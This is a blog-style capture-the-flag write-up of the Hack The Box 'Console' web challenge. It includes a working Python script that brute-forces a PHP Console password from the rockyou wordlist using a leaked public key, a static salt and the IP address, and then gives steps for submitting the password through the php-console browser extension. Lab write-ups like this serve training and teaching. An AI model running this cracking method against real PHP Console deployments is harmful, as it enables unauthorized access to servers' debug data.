Post

HackTheBox Console Challenge

Posted
By x3ric
1 min read

Explore the basics of cybersecurity in the Console Challenge on Hack The Box. This medium-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/113

Description

Could you please check the console of your Chrome?

Exploitation

Copy the php-console-client cookie, decode it, and extract the publicKey. Replace pubkey and ip_address in the PoC with the extracted publicKey and the IP address displayed on the webpage.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

#!/usr/bin/env python3
import hashlib

def crack():
    with open("/usr/share/dict/rockyou.txt", "r", encoding="latin-1") as infile:
        rockyou = infile.read().split()
    salt = "NeverChangeIt:)".encode()
    ip_address = "10.30.18.25".encode()
    pubkey = "370244b500c702b16dddb1678c882d2b7aa0b3bcdf94fb6bb9e792460c5d460b"
    for word in rockyou:
        try:
            password = hashlib.sha256(word.encode() + salt).hexdigest().encode()
            attempt = hashlib.sha256(ip_address + password).hexdigest()
            print("Attempt -> " + word + " - " + attempt)
            if attempt == pubkey:
                print(word)
                quit()
        except UnicodeDecodeError:
            print(word)
            continue
        except KeyboardInterrupt:
            quit()

if __name__ == "__main__":
    crack()

1

git clone https://github.com/barbushin/php-console-extension

go in chromium enable developer mode in chrome://extensions/

click on pack extension and select the dir of the repo php-console-extension

drag and drop the packed .crx extension

go in the webpage and send the password poohbear Your request headers reveal that PHP Console Debugging is enabled on the server, which exposes sensitive data in the php-console header. The key steps to extract useful information:

Open Developer Tools (F12) and navigate to the “Network” Tab.

Refresh the page (F5) and check the response headers php-console to retrieve the flag without needing to type it.

Summary

The Console Challenge on Hack The Box is a medium-level web security challenge that involves exploiting weak cryptographic implementations in a browser-based PHP console. Participants analyze cookies stored in the browser, decode the php-console-client value to extract the publicKey, and use a brute-force approach to recover the corresponding password by hashing a wordlist with a static salt and IP address. Once the password is cracked, it is submitted through the PHP Console browser extension, demonstrating the dangers of using predictable salts, weak password hashing, and insecure browser-based debugging tools in web applications.

challenge
htb challenge writeup linux web
This post is licensed under CC BY 4.0 by the author.